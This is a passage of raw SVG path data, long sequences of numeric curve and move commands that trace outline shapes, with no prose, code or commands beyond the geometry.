343.26715,354 342.96128,354.41363 343.5275,355.75 C 344.17043,357.2674 344.55279,365.5 343.98033,365.5 C 343.86573,365.5 343.62523,366.7375 343.44589,368.25 C 343.26656,369.7625 343.5587,371 344.0951,371 C 344.70046,371 344.66856,371.75079 344.01098,372.97948 C 343.05334,374.76886 343.45425,379.06063 344.79893,381.41448 C 345.08626,381.91745 345.42494,383.64585 345.55155,385.25537 C 345.67817,386.86488 346.28087,388.68087 346.89088,389.29088 C 347.5009,389.9009 348,391.21 348,392.2 C 348,394.53318 349.11079,394.47708 351.75871,392.01017 z M 341.02855,375.75 C 342.05826,374.49707 342.66096,372.60566 342.38862,371.48182 C 342.11963,370.37182 342.2967,366.93103 342.78211,363.83563 C 343.73896,357.73386 342.29112,353 339.46806,353 C 338.66063,353 338,352.14213 338,351.09362 C 338,349.65936 337.48843,349.32102 335.93429,349.72743 C 332.7978,350.54765 329.39616,348.20493 327.44684,343.88211 C 325.81559,340.26464 325.80868,339.86889 327.34709,338.16896 C 328.25619,337.16442 329,335.73839 329,335 C 329,333.15337 331.99614,330 333.7507,330 C 335.69496,330 341,326.8016 341,325.6294 C 341,325.11275 339.99525,325.54727 338.76723,326.59501 C 336.75676,328.31034 336.67569,328.31818 337.95293,326.67378 C 339.88299,324.18891 337.98015,323.05906 332.85653,323.64768 C 330.59659,323.90732 329,323.66549 329,323.06356 C 329,322.49861 327.425,320.41456 325.5,318.43234 C 323.24441,316.10971 322,315.37542 322,316.3671 C 322,319.74398 319.59004,322.9802 316.25589,324.08056 C 313.82097,324.88416 312.3982,326.19606 311.41838,328.54111 C 309.70845,332.63355 308.0221,333.79088 306.84188,331.68193 C 306.32012,330.7496 305.2847,330.33726 304.35815,330.69281 C 303.08275,331.18222 302.90086,330.8287 303.43638,328.90127 C 304.07128,326.61618 304.03036,326.59135 302.59053,328.38814 C 301.45701,329.80268 301.33893,330.76478 302.11977,332.22379 C 302.69302,333.29492 302.95539,334.37794 302.70282,334.63052 C 302.45024,334.88309 303.42628,336.36938 304.87179,337.93338 C 308.85608,342.24425 309.45876,343.16117 311.23391,347.61271 C 312.13593,349.87471 314.03871,353.44181 315.46232,355.53961 C 316.88592,357.63741 318.33488,360.4861 318.68223,361.87004 C 319.54636,365.31301 322.94791,368.24562 330.01086,371.63692 C 333.29043,373.21161 335.97963,375.025 335.98686,375.66667 C 335.99777,376.63516 337.11896,377.52116 338.83971,377.92105 C 339.02655,377.96447 340.01153,376.9875 341.02855,375.75 z M 310,329.09597 C 310,326.93507 312.52968,324.50951 316.26412,323.08968 C 321.91036,320.94299 322.09053,314 316.5,314 C 315.25969,314 313.68469,313.325 313,312.5 C 311.14963,310.27044 306.92115,310.58552 306.28975,313 C 306.00209,314.1 305.34266,315 304.82435,315 C 304.30604,315 304.14086,315.41891 304.45729,315.9309 C 304.77373,316.4429 304.57528,317.14446 304.01631,317.48992 C 302.38366,318.49896 302.7419,323.31302 304.40223,322.67589 C 306.48692,321.87592 306.98901,322.8987 305.90773,325.74268 C 305.16619,327.69307 305.32747,328.70437 306.60523,330.11627 C 308.48904,332.19786 310,331.74374 310,329.09597 z M 384.94368,304.89477 C 384.41874,303.91391 383.54166,302.83477 382.99462,302.49668 C 381.75862,301.73278 381.67113,297 382.89301,297 C 384.50969,297 385.02169,293.87883 383.63284,292.48998 C 382.61678,291.47392 381.98333,291.41667 381.13571,292.26429 C 380.2881,293.1119 380,292.74615 380,290.82244 C 380,287.34646 377.55678,285.29302 375.47583,287.02006 C 374.63754,287.71578 374.15004,288.48338 374.3925,288.72583 C 374.63496,288.96829 373.98104,290.01896 372.93935,291.06065 C 370.82025,293.17975 371.3426,295.99586 373.85699,296.0078 C 376.17859,296.01883 377.88063,300.1004 376.68294,302.78454 C 375.98047,304.35882 376.16424,305.60171 377.37199,307.44497 C 378.99127,309.9163 379.07684,309.931 382.45855,308.31838 C 385.28494,306.97057 385.72797,306.36023 384.94368,304.89477 z M 313.65956,283.55521 C 313.33133,282.69985 312.12209,282 310.97237,282 C 309.82265,282 309.16008,282.45 309.5,283 C 309.83992,283.55 310.76648,284 311.55902,284 C 313.21743,284 313.48511,285.58215 311.98369,286.51008 C 311.42472,286.85554 311.2789,287.64225 311.65965,288.25831 C 312.61762,289.80835 314.42664,285.55418 313.65956,283.55521 z M 304.09692,286.61678 C 303.21168,285.55013 303.29809,285.09959 304.47448,284.64817 C 305.31351,284.3262 306,283.60829 306,283.05282 C 306,282.40733 305.09784,282.45393 303.5,283.18195 C 301.62248,284.03741 300.3658,284.03207 298.45295,283.16052 C 295.1771,281.66794 294.94604,281.69581 295.63837,283.5 C 295.95496,284.325 297.06583,285 298.10699,285 C 299.14814,285 300,285.47656 300,286.05902 C 300,286.64148 300.41891,286.85914 300.9309,286.54271 C 301.4429,286.22627 302.14446,286.42472 302.48992,286.98369 C 302.83538,287.54266 303.59658,288 304.18146,288 C 304.89195,288 304.8639,287.54093 304.09692,286.61678 z M 293.0338,277.81518 C 291.22015,274.83287 291.25801,267.6851 293.09953,265.40799 C 295.3248,262.65636 288.95228,262.90487 286.17928,265.67786 C 285.442,266.41515 284.44762,266.77664 283.96955,266.48118 C 283.49149,266.18572 282.61194,266.85659 282.01499,267.97199 C 280.137,271.48104 282.91445,274.57481 288.8807,275.61961 C 289.64008,275.75259 290.76508,276.4086 291.3807,277.0774 C 292.21767,277.98669 292.18565,278.11599 291.25376,277.59001 C 288.78375,276.1959 286.14767,276.17278 285.62278,277.54063 C 285.32829,278.30805 285.58722,279.24489 286.19818,279.62248 C 286.87084,280.03821 287.02756,279.85361 286.59549,279.15451 C 285.42348,277.25815 287.29983,277.90834 290.46589,280.49567 C 294.11986,283.48172 295.56344,281.97485 293.0338,277.81518 z M 335.60417,279.27083 C 334.58765,278.25432 333.74892,279.78472 334.58295,281.13421 C 335.21298,282.15363 335.44853,282.15442 335.78725,281.13825 C 336.01885,280.44346 335.93646,279.60312 335.60417,279.27083 z M 369.49292,278.01145 C 369.84326,277.44459 369.44186,277.27695 368.55194,277.61844 C 366.81952,278.28323 366.50255,279 367.94098,279 C 368.45852,279 369.1569,278.55515 369.49292,278.01145 z M 274.5,266 C 274.16008,265.45 273.20697,265 272.38197,265 C 271.55697,265 271.16008,265.45 271.5,266 C 271.83992,266.55 272.79303,267 273.61803,267 C 274.44303,267 274.83992,266.55 274.5,266 z M 272.51624,258.41547 C 272.53214,253.11428 272.47185,253 269.65925,253 C 267.75477,253 266.95833,253.42146 267.29708,254.25 C 267.57816,254.9375 268.11167,256.2542 268.48266,257.17599 C 269.00535,258.47473 268.52048,258.92492 266.32859,259.17599 C 264.30024,259.40834 263.41127,260.12379 263.18636,261.70492 C 262.93588,263.46581 263.54001,264.08614 266.18636,264.78533 C 271.16682,266.10121 272.49721,264.76242 272.51624,258.41547 z M 274.40044,258.60115 C 274.10521,257.83178 274.34433,256.90523 274.93183,256.54213 C 275.51932,256.17904 276,254.75697 276,253.38197 C 276,252.00697 275.58462,251.13868 275.07694,251.45245 C 273.84483,252.21393 272.68713,257.68474 273.48492,258.9756 C 274.41201,260.47566 275.02375,260.22546 274.40044,258.60115 z M 200.92611,231.41097 C 199.17181,229.29717 197.80263,229.71109 199.19168,231.93532 C 199.85642,232.99974 200.78209,233.63468 201.24871,233.34629 C 201.71533,233.0579 201.57017,232.18701 200.92611,231.41097 z M 197,228.64922 C 197,227.1819 194.63423,222 193.96432,222 C 192.85436,222 193.09676,226.16014 194.29936,227.75 C 195.159,228.88645 197,229.49945 197,228.64922 z M 191,212.821 C 191,209.95022 188.43191,204.95447 186.66847,204.39478 C 185.12617,203.90527 185.01495,203.60452 186.11787,202.90599 C 186.91402,202.40175 187.02195,202.02413 186.37244,202.01531 C 182.56885,201.96366 183.04615,208.31523 187,210.3665 C 188.375,211.07985 189.3875,212.18922 189.25,212.83175 C 189.1125,213.47429 189.45,214 190,214 C 190.55,214 191,213.46945 191,212.821 z M 322.29767,178.66667 C 322.57908,177.93333 322.17722,177.33333 321.40466,177.33333 C 320.6321,177.33333 320,177.93333 320,178.66667 C 320,180.39401 321.63483,180.39401 322.29767,178.66667 z M 303,165.83222 C 303,164.65241 300.24351,164.79698 299.48992,166.01631 C 299.14446,166.57528 298.49005,166.80287 298.03569,166.52206 C 297.58132,166.24124 296.97175,166.63125 296.68107,167.38873 C 296.24927,168.51398 296.77901,168.57371 299.57629,167.71521 C 301.45933,167.13728 303,166.28994 303,165.83222 z M 299.27666,158.16464 C 299.44398,155.78077 299.87626,155.13426 301,155.58723 C 305.72762,157.49289 305.59594,157.49229 304.05601,155.60103 C 303.07285,154.39355 301.76923,153.99615 299.97112,154.35578 C 298.51862,154.64628 296.13092,154.26175 294.66511,153.50128 C 292.20391,152.2244 290.73934,153.10283 293,154.5 C 293.55,154.83992 294,155.94333 294,156.95203 C 294,157.96073 294.675,159.04504 295.5,159.36163 C 296.325,159.67821 297,160.71635 297,161.66862 C 297,164.72922 299.03582,161.59592 299.27666,158.16464 z M 317.37804,161.19733 C 317.96375,160.24964 309.27283,160.39384 308.31903,161.34764 C 307.96023,161.70644 309.74011,162 312.27432,162 C 314.80852,162 317.1052,161.6388 317.37804,161.19733 z M 359.84502,157.52448 C 360.17089,155.87183 360.0212,155.8744 357.1494,157.57082 C 355.47705,158.5587 354.32361,159.7146 354.58621,160.13949 C 355.38343,161.42941 359.47637,159.39415 359.84502,157.52448 z M 367.43362,156.10222 C 368.49712,155.68575 368.94712,155.12569 368.43362,154.85764 C 367.08592,154.15411 365.7703,154.39093 363.5,155.7457 C 361.5,156.93918 361.5,156.93918 363.5,156.89931 C 364.6,156.87737 366.37013,156.51868 367.43362,156.10222 z M 364,154.60699 C 364,153.65836 361.00662,153.18027 360.47301,154.04367 C 360.14793,154.56965 360.80852,155 361.94098,155 C 363.07344,155 364,154.82314 364,154.60699 z M 373.03297,151.5 C 374.38998,149.64999 374.36876,149.60293 372.75,150.87244 C 371.7875,151.62729 371,152.71479 371,153.28911 C 371,153.86343 371.12734,154.14583 371.28297,153.91667 C 371.4386,153.6875 372.2261,152.6 373.03297,151.5 z M 345.43071,143.09738 C 345.16763,142.8343 344.1756,143.43005 343.22619,144.42128 C 341.5769,146.14322 341.59821,146.16453 343.70452,144.89961 C 344.91701,144.17146 345.69379,143.36046 345.43071,143.09738 z M 154.23496,142.83496 C 153.61252,142.21252 151.84252,141.65752 150.30162,141.60162 C 148.09522,141.52159 147.56197,141.07509 147.7917,139.5 C 148.03198,137.85254 147.90247,137.76441 147.05701,139 C 146.36529,140.01091 146.02563,140.09243 146.01531,139.25 C 146.00676,138.55205 144.78548,138.00839 143.25,138.019 C 140.70216,138.0366 140.85688,138.26206 145.35451,141.08589 C 148.02449,142.76222 150.82258,143.89832 151.57248,143.61056 C 152.32239,143.32279 153.22042,143.54763 153.56811,144.11021 C 153.9158,144.67278 154.46271,144.87062 154.78347,144.54986 C 155.10423,144.22911 154.8574,143.4574 154.23496,142.83496 z M 349.1875,142.31689 C 348.46562,142.02802 347.60312,142.06354 347.27083,142.39583 C 346.93854,142.72813 347.52917,142.96447 348.58333,142.92105 C 349.74828,142.87307 349.98523,142.63611 349.1875,142.31689 z M 367,141 C 366.175,140.46684 364.825,140.03063 364,140.03063 C 362.66667,140.03063 362.66667,140.13833 364,141 C 364.825,141.53316 366.175,141.96937 367,141.96937 C 368.33333,141.96937 368.33333,141.86167 367,141 z M 28.457295,117.0691 C 29.475347,115.42186 27.548306,115.13484 24.987451,116.5523 L 22.5,117.92913 L 25.190983,117.96456 C 26.671024,117.98405 28.140864,117.58109 28.457295,117.0691 z M 70,102 C 71.292687,101.1646 71.266292,101.02851 69.809017,101.01531 C 68.878976,101.00689 67.839919,101.45 67.5,102 C 66.717818,103.2656 68.041628,103.2656 70,102 z M 290.83869,90.957024 C 292.77738,89.775061 294.97884,89.175897 296.08869,89.52815 C 297.13991,89.861794 298,89.726683 298,89.227903 C 298,88.162418 293.5745,86 291.39393,86 C 290.47464,86 290.1586,85.510013 290.58769,84.75 C 291.1399,83.771892 291.01066,83.761712 289.99351,84.703196 C 289.06358,85.563945 288.14361,85.612039 286.76116,84.872176 C 284.54677,83.687071 284.48769,83.721768 283.55528,86.754926 C 283.06717,88.342756 283.32626,89.187966 284.43105,89.611915 C 285.29397,89.943049 286,90.840833 286,91.606989 C 286,93.481445 286.89532,93.361179 290.83869,90.957024 z M 302.1875,90.316886 C 301.46562,90.028015 300.60312,90.063542 300.27083,90.395833 C 299.93854,90.728125 300.52917,90.964474 301.58333,90.921053 C 302.74828,90.873069 302.98523,90.636112 302.1875,90.316886 z M 322.1257,87.577688 C 322.53056,87.827903 323.10861,87.633288 323.41025,87.145212 C 324.23476,85.811126 315.90149,84.982352 313.67016,86.176524 C 310.73381,87.748012 313.4639,88.910288 317.79636,87.93316 C 319.77264,87.487436 321.72085,87.327474 322.1257,87.577688 z M 287,81.940983 C 287,81.358524 287.41891,81.140864 287.9309,81.457295 C 288.4429,81.773726 289.14446,81.575283 289.48992,81.016312 C 290.19623,79.873477 288.95029,79.69811 286.58179,80.606989 C 284.83707,81.276499 284.41805,83 286,83 C 286.55,83 287,82.523442 287,81.940983 z M 309.25,68.337719 C 308.5625,68.060307 307.4375,68.060307 306.75,68.337719 C 306.0625,68.615132 306.625,68.842105 308,68.842105 C 309.375,68.842105 309.9375,68.615132 309.25,68.337719 z M 280.75,66.310674 C 279.7875,66.059147 278.2125,66.059147 277.25,66.310674 C 276.2875,66.562202 277.075,66.767997 279,66.767997 C 280.925,66.767997 281.7125,66.562202 280.75,66.310674 z M 283.83385,64.123851 C 284.90001,63.448009 284.83712,63.151475 283.52046,62.646226 C 282.61449,62.298571 282.12956,61.599382 282.44285,61.092473 C 282.75614,60.585564 282.51031,60.003438 281.89658,59.798859 C 281.16806,59.556019 281.29207,59.002489 282.25384,58.204296 C 283.49145,57.177173 283.68317,57.380848 283.45294,59.478159 C 283.22909,61.51736 283.48305,61.818534 284.83945,61.12244 C 285.75275,60.653738 287.175,59.979458 288,59.624039 C 288.825,59.268621 288.4875,59.165684 287.25,59.395292 C 284.70321,59.867828 284.23252,58.528885 286.49945,57.260246 C 287.4645,56.720177 285.86071,56.336671 281.99945,56.184181 C 278.40981,56.042419 276,56.359517 276,56.973625 C 276,57.538131 275.51786,58 274.92857,58 C 273.40973,58 271.5,60.22802 271.5,62 C 271.5,63.023275 272.93018,63.688432 276,64.092896 C 278.475,64.418989 280.95,64.749598 281.5,64.827584 C 282.05,64.905569 283.10023,64.588889 283.83385,64.123851 z M 334.21737,63.764947 C 332.52961,62.951839 331.63052,62.969476 330.76737,63.832627 C 329.87754,64.722458 330.42024,64.983909 333.05,64.93232 C 336.28999,64.868759 336.36105,64.797697 334.21737,63.764947 z M 240.53623,63.058616 C 240.21623,62.540855 241.20217,62.203355 242.72721,62.308616 C 246.62377,62.577565 246.4266,59.687008 242.5,58.977765 C 239.67486,58.467474 239.61657,58.366672 241.5,57.248353 C 243.3273,56.163364 243.21936,56.058192 240.25,56.030409 C 236.03298,55.990952 235.45088,56.227002 235.81842,57.827502 C 235.98609,58.557628 235.09668,59.423464 233.84195,59.751582 C 231.76481,60.294766 231.91592,60.50494 235.53032,62.099916 C 240.14461,64.136128 241.34415,64.365856 240.53623,63.058616 z M 289.5,62 C 289.16008,61.45 288.43197,61 287.88197,61 C 287.33197,61 287.16008,61.45 287.5,62 C 287.83992,62.55 288.56803,63 289.11803,63 C 289.66803,63 289.83992,62.55 289.5,62 z M 231.42689,59.104581 C 233.15102,58.429157 233.17733,58.282025 231.67689,57.706251 C 229.7496,56.96668 227,57.79019 227,59.106989 C 227,60.1592 228.7372,60.158255 231.42689,59.104581 z M 309.78934,58.848646 C 309.00359,58.350129 310.25761,57.999887 313,57.951926 C 316.49358,57.890828 317.03055,57.683452 315.40097,57.024687 C 314.24651,56.55799 311.25918,56.207028 308.76246,56.244773 C 305.16677,56.29913 304.28783,56.64466 304.53497,57.906699 C 304.70657,58.783015 304.88141,59.5375 304.92349,59.583333 C 304.96557,59.629167 306.36771,59.666667 308.03934,59.666667 C 309.99893,59.666667 310.62064,59.376056 309.78934,58.848646 z M 219,56.393011 C 219,56.176855 217.7625,56.006891 216.25,56.015313 C 214.24861,56.026457 213.88365,56.273494 214.90932,56.922793 C 216.18265,57.728876 219,57.364003 219,56.393011 z M 455.5,505.50876 C 452.35179,504.50013 451.87648,504.07231 453.26796,503.49974 C 455.18074,502.71265 461,504.68569 461,506.12132 C 461,507.18575 460.59278,507.1404 455.5,505.50876 z M 376.51652,498.02673 C 376.19721,497.51007 375.29691,497.33257 374.51586,497.63229 C 372.14722,498.54122 370.8015,497.05564 372.47634,495.3808 C 374.11727,493.73988 383.5,493.77897 383.5,495.42673 C 383.5,496.8046 377.2088,499.14686 376.51652,498.02673 z M 322.27495,496 C 322.35781,494.9 323.02068,494 323.74799,494 C 324.76049,494 324.81954,494.46867 324,496 C 322.641,498.53932 322.08367,498.53932 322.27495,496 z M 1168,492.55902 C 1168,492.31648 1168.45,491.83992 1169,491.5 C 1169.55,491.16008 1170,491.35852 1170,491.94098 C 1170,492.52344 1169.55,493 1169,493 C 1168.45,493 1168,492.80156 1168,492.55902 z M 827,487 C 827,484.95548 829.40735,484.23205 830.47301,485.95633 C 830.79808,486.48231 831.72464,486.65916 832.53203,486.34934 C 833.44736,485.99809 834,486.391 834,487.39301 C 834,488.5629 833.04801,489 830.5,489 C 827.66667,489 827,488.61905 827,487 z M 1174,479 C 1174.9395,477.24446 1174.7605,477 1172.5352,477 C 1171.1408,477 1170,476.50554 1170,475.90121 C 1170,474.13803 1175.6644,469.34088 1180.5242,466.98826 C 1183.2024,465.69178 1186.2802,463.04433 1188.1725,460.40936 C 1191.3633,455.96623 1194,454.67657 1194,457.55902 C 1194,458.55079 1194.4544,458.83722 1195.2488,458.34623 C 1197.3108,457.07183 1200.4608,457.4025 1201.0864,458.95904 C 1201.5487,460.10914 1202.2368,459.85409 1204.3364,457.7545 C 1205.8014,456.28952 1207,454.21924 1207,453.15386 C 1207,451.92167 1207.9097,450.9885 1209.5,450.58936 C 1213.5325,449.57726 1212.5105,447.47952 1207.9263,447.35932 C 1205.6857,447.30057 1203.3457,446.74569 1202.7263,446.12625 C 1201.0096,444.40964 1200.072,444.77764 1200.5,447 C 1200.7118,448.1 1200.461,449 1199.9426,449 C 1199.4242,449 1199,449.6375 1199,450.41667 C 1199,451.19583 1198.4375,452.0445 1197.75,452.3026 C 1197.0117,452.57978 1197.5233,453.20193 1199,453.82254 C 1200.375,454.40042 1200.825,454.89486 1200,454.9213 C 1199.175,454.94774 1197.8777,454.57524 1197.1171,454.09352 C 1195.958,453.35943 1195.9985,452.84029 1197.3671,450.88632 C 1199.6881,447.57265 1199.4534,446.38557 1195.3803,440.83698 C 1193.3895,438.12494 1191.9567,435.70998 1192.1963,435.47039 C 1192.4359,435.23081 1194.0494,435.56981 1195.7818,436.22374 C 1197.9426,437.03933 1199.1205,438.27208 1199.5328,440.14929 C 1199.949,442.04441 1200.5928,442.70974 1201.6266,442.31305 C 1202.579,441.94757 1203.3122,442.47767 1203.6521,443.77767 C 1204.2548,446.08249 1207.3335,447.20538 1210.7199,446.35546 C 1212.4133,445.93044 1213,446.21396 1213,447.45733 C 1213,450.28353 1211.075,452.966 1209.4847,452.35577 C 1208.474,451.96792 1208,452.43031 1208,453.80412 C 1208,454.91407 1206.6174,456.9856 1204.9275,458.40751 C 1202.5288,460.42593 1201.4472,460.77449 1199.9947,459.99716 C 1198.5288,459.21264 1198.0086,459.39748 1197.5416,460.86887 C 1197.2156,461.89592 1196.0908,463.51286 1195.0419,464.46207 C 1193.993,465.41128 1193.3649,466.78733 1193.646,467.51995 C 1193.9833,468.39893 1193.1951,468.96219 1191.3286,469.17599 C 1189.2965,469.40877 1188.0776,470.39267 1187,472.6702 C 1185.6268,475.57239 1179.4331,479.76647 1178.2571,478.59048 C 1177.9848,478.3181 1177.1083,478.74881 1176.3095,479.54762 C 1174.1604,481.69679 1172.7373,481.35936 1174,479 z M 1185.9879,471.30237 C 1187.6703,467.72327 1188.4373,467.00402 1190.032,467.51016 C 1191.2153,467.88573 1192,467.67342 1192,466.97768 C 1192,466.34128 1192.8809,465.07345 1193.9575,464.16029 C 1195.9792,462.44557 1196.9878,460.5 1195.855,460.5 C 1195.5002,460.5 1194.2627,459.64276 1193.105,458.59501 C 1191.9463,457.54637 1191,457.20923 1191,457.84501 C 1191,458.48026 1190.2125,459.85439 1189.25,460.89865 C 1188.2875,461.9429 1186.4361,463.97223 1185.1358,465.40826 C 1183.8355,466.84429 1181.5855,468.29815 1180.1358,468.63905 C 1176.4436,469.5073 1171.0406,475.80011 1173.75,476.07651 C 1175.8718,476.29296 1178.2407,476.90734 1178.6914,477.35807 C 1180.0132,478.67988 1184.1236,475.26848 1185.9879,471.30237 z M 1197.531,439.05022 C 1197.163,438.45466 1196.3949,438.25597 1195.8241,438.60869 C 1195.1523,439.02393 1195.2545,439.53928 1196.1143,440.07063 C 1197.719,441.06242 1198.4495,440.53632 1197.531,439.05022 z M 1228.5966,469.15623 C 1228.2505,468.59631 1228.4547,467.83704 1229.0502,467.46896 C 1230.5877,466.51875 1231.5797,467.82031 1230.2962,469.1038 C 1229.578,469.82198 1229.0187,469.83923 1228.5966,469.15623 z M 1097.2463,466.41859 C 1096.6389,465.76837 1095.9975,464.39569 1095.821,463.36819 C 1095.6444,462.34068 1094.8644,461.00257 1094.0875,460.39461 C 1093.3107,459.78664 1092.9528,458.56545 1093.2922,457.68084 C 1093.8042,456.34662 1094.4315,456.25447 1096.9724,457.14021 C 1100.8001,458.47458 1105.3997,457.48406 1104.6346,455.49015 C 1103.8174,453.36051 1105.7613,452.66197 1106.7722,454.72199 C 1108.1005,457.42861 1106.1723,467.2801 1104.4441,466.61692 C 1103.6851,466.32566 1102.8158,466.48906 1102.5123,466.98004 C 1101.7583,468.20009 1098.5955,467.86288 1097.2463,466.41859 z M 1102,465 C 1102,464.45 1102.6664,464 1103.4809,464 C 1104.8905,464 1106.7648,459.43147 1105.7653,458.43195 C 1105.5041,458.17075 1104.2401,458.34555 1102.9564,458.82041 C 1101.5463,459.34207 1099.525,459.2695 1097.8494,458.63706 C 1094.2879,457.29275 1092.9557,458.58023 1095.8271,460.59142 C 1097.0406,461.4414 1097.7433,462.60637 1097.3886,463.18023 C 1096.6983,464.2971 1098.6908,465.95946 1100.75,465.98469 C 1101.4375,465.99311 1102,465.55 1102,465 z M 1091,454.55902 C 1091,453.70156 1091.45,453 1092,453 C 1093.2939,453 1093.2939,454.70032 1092,455.5 C 1091.45,455.83992 1091,455.41648 1091,454.55902 z M 1096.6499,450.36831 C 1094.1691,449.50944 1092.1956,449.36013 1091.0968,449.94819 C 1090.1593,450.44993 1088.7837,450.48438 1088.04,450.02475 C 1087.2963,449.56511 1085.6331,449.38031 1084.3439,449.61408 C 1083.0548,449.84785 1082,449.58031 1082,449.01956 C 1082,448.4588 1081.1158,448 1080.0352,448 C 1078.9545,448 1077.5887,447.1 1077,446 C 1076.4113,444.9 1076.1863,444 1076.5,444 C 1076.8137,444 1076.6003,443.1217 1076.0258,442.04823 C 1075.1303,440.37494 1074.2692,440.18079 1069.9906,440.68752 C 1067.2363,441.01372 1065,440.87208 1065,440.37143 C 1065,439.87249 1066.1237,437.81057 1067.4971,435.78939 C 1068.9738,433.61624 1069.5868,431.86267 1068.9971,431.49824 C 1068.4487,431.15929 1068,431.3282 1068,431.8736 C 1068,432.41899 1067.1,433.15087 1066,433.5 C 1064.9,433.84913 1064,435.00826 1064,436.07586 C 1064,437.76662 1063.7421,437.85587 1062,436.76793 C 1060.9,436.08097 1059.9858,435.06465 1059.9684,434.50945 C 1059.9046,432.47086 1055.3886,428.44627 1051.4219,426.89291 C 1047.2246,425.24926 1044.4879,425.28622 1035,427.11474 C 1031.975,427.69772 1028.5066,428.36418 1027.2925,428.59575 C 1026.0783,428.82732 1023.8938,430.12066 1022.438,431.46984 C 1020.1494,433.5909 1018.8985,433.90769 1013.1959,433.81051 C 1009.02,433.73935 1006.4599,434.12033 1006.217,434.84906 C 1006.006,435.48208 1004.9708,436 1003.9167,436 C 1002.8625,436 1002,436.45 1002,437 C 1002,438.60091 996.3942,438.15527 992.5657,436.25 C 989.2412,434.59554 987.28972,430.40647 990.3994,431.59977 C 993.04582,432.6153 991.25638,422.55124 987.38902,414.66896 C 986.62506,413.11189 986,411.26913 986,410.57395 C 986,409.87876 985.1,408.49549 984,407.5 C 982.9,406.50451 982.00689,404.97227 982.01531,404.09501 C 982.02871,402.7 982.15218,402.68809 983,404 C 984.04922,405.62355 984.04089,405.65245 984.45014,398.96674 C 984.60277,396.47345 985.06751,393.36265 985.48291,392.05385 C 986.17174,389.88353 986.3259,389.83096 987.23542,391.45619 C 987.90679,392.65586 987.89378,393.44761 987.19562,393.8791 C 985.16189,395.13601 984.76815,399.82887 986.41879,403.13767 C 987.4216,405.14784 987.67662,406.72338 987.09358,407.30642 C 986.11312,408.28688 986.35107,409.52694 988.47391,414.5 C 992.76,424.54077 993.84165,431.42961 991.35098,432.82346 C 990.127,433.50843 990.5258,434.02162 993.308,435.34187 C 997.75118,437.45029 998.23307,437.42948 1003.2983,434.91032 C 1006.1765,433.47886 1009.3647,432.83184 1013.4199,432.85621 C 1018.2723,432.88537 1019.8642,432.45064 1022.247,430.4456 C 1023.8459,429.1002 1026.132,427.81386 1027.3271,427.58706 C 1028.5222,427.36027 1031.975,426.69772 1035,426.11474 C 1043.6422,424.44922 1047.3731,424.17324 1049.0953,425.07212 C 1049.9727,425.53008 1051.9469,426.1326 1053.4824,426.41104 C 1056.6152,426.97911 1058.918,429.15785 1060.7545,433.29126 L 1061.9947,436.08251 L 1065.9908,432.12616 C 1070.0216,428.13544 1071.1393,427.99649 1070.5678,431.55714 C 1070.3937,432.64194 1071.7864,435.39113 1073.7212,437.78201 C 1075.627,440.13712 1077.2971,442.83712 1077.4324,443.78201 C 1077.7025,445.66809 1081.4592,447.96207 1084.3157,447.98526 C 1085.3144,447.99337 1086.9397,448.43256 1087.9276,448.96125 C 1089.1879,449.63572 1090.287,449.49603 1091.6119,448.49306 C 1094.0821,446.6229 1095.5055,446.64841 1097.4549,448.59776 C 1098.8638,450.00663 1099.3155,450.02447 1101.2763,448.74862 C 1102.4993,447.95283 1105.1717,446.99141 1107.2149,446.61213 C 1111.2947,445.8548 1111.6879,445.49565 1112.3402,441.92993 C 1113.1008,437.77207 1116.3404,431.62671 1119.3524,428.628 C 1122.9056,425.09044 1125.3607,416.01218 1123.9844,411.5 C 1123.4811,409.85 1122.8242,407.27836 1122.5245,405.78525 C 1121.9848,403.09651 1117.7294,398 1116.0241,398 C 1115.5373,398 1114.9953,396.9875 1114.8196,395.75 C 1114.6086,394.26487 1113.9149,393.59763 1112.779,393.78719 C 1111.6297,393.97896 1110.5842,392.94056 1109.632,390.66156 C 1108.8477,388.78451 1107.0135,386.40528 1105.5561,385.37437 C 1099.5328,381.11381 1098.7554,380.27681 1098.4784,377.75408 C 1098.3191,376.30218 1097.8087,374.52606 1097.3443,373.80713 C 1096.8799,373.08821 1096.0231,370.925 1095.4402,369 C 1094.6082,366.25224 1093.9096,365.5512 1092.1902,365.73821 C 1090.9856,365.86923 1089.9315,365.41923 1089.8477,364.73821 C 1089.2511,359.88802 1086.8025,353 1085.675,353 C 1085.1204,353 1084.9142,353.24753 1085.2167,353.55006 C 1085.5193,353.8526 1085.3346,355.7651 1084.8065,357.80006 C 1084.2783,359.83503 1083.6891,363.45024 1083.4972,365.83386 C 1082.7958,374.54672 1078.6059,379.33441 1074.8214,375.74759 C 1074.0946,375.05876 1071.7,373.59626 1069.5,372.49759 C 1064.0384,369.77009 1060.6186,366.42279 1061.6333,364.7978 C 1062.0791,364.08401 1062.5346,362.89966 1062.6457,362.16592 C 1062.7568,361.43218 1063.6695,360.22081 1064.6739,359.474 C 1066.4216,358.17444 1066.4142,358.11751 1064.5,358.14767 C 1061.9553,358.18776 1056.6902,357.35384 1053.9032,356.46929 C 1052.4497,356.00795 1051.972,356.14566 1052.4338,356.89287 C 1052.8851,357.62316 1051.9066,358 1049.559,358 C 1047.6016,358 1046,358.45 1046,359 C 1046,359.55 1045.2984,360 1044.441,360 C 1043.5835,360 1043.076,360.3375 1043.3131,360.75 C 1043.5502,361.1625 1042.9018,362.36623 1041.8721,363.42497 C 1039.1837,366.18928 1039.5661,364.10287 1042.5536,359.70626 C 1044.0075,357.56667 1045.5814,356.24127 1046.2081,356.62864 C 1046.8363,357.01686 1047.0275,356.85358 1046.6535,356.24839 C 1046.293,355.66504 1045.0382,355.43875 1043.8651,355.74552 C 1042.3772,356.13462 1041.8657,355.903 1042.1735,354.9796 C 1042.6697,353.49091 1050.8885,352.68051 1052.4912,353.96224 C 1053.7357,354.95752 1059.5805,356.30024 1063.1673,356.4148 C 1066.6887,356.52729 1067.3974,357.38886 1066.0458,359.91435 C 1065.3043,361.29986 1065.2771,362 1065.9648,362 C 1066.5342,362 1067,362.675 1067,363.5 C 1067,364.43333 1066.0556,365 1064.5,365 C 1060.8017,365 1061.4173,366.15058 1067.1092,369.8768 C 1071.4714,372.73255 1072.5679,373.06229 1074.6092,372.13221 C 1076.9204,371.07917 1078.0633,372.22484 1075.9837,373.51008 C 1074.5724,374.38231 1075.7621,376 1077.8149,376 C 1080.0204,376 1082.0208,371.38088 1082.4408,365.31849 C 1082.9525,357.93059 1084.0684,353.18813 1085.5928,351.923 C 1086.6757,351.02427 1087.1052,351.17951 1087.5695,352.63738 C 1087.8958,353.66182 1088.6572,355.625 1089.2615,357 C 1089.8659,358.375 1090.3917,360.6236 1090.4302,361.99688 C 1090.4719,363.48977 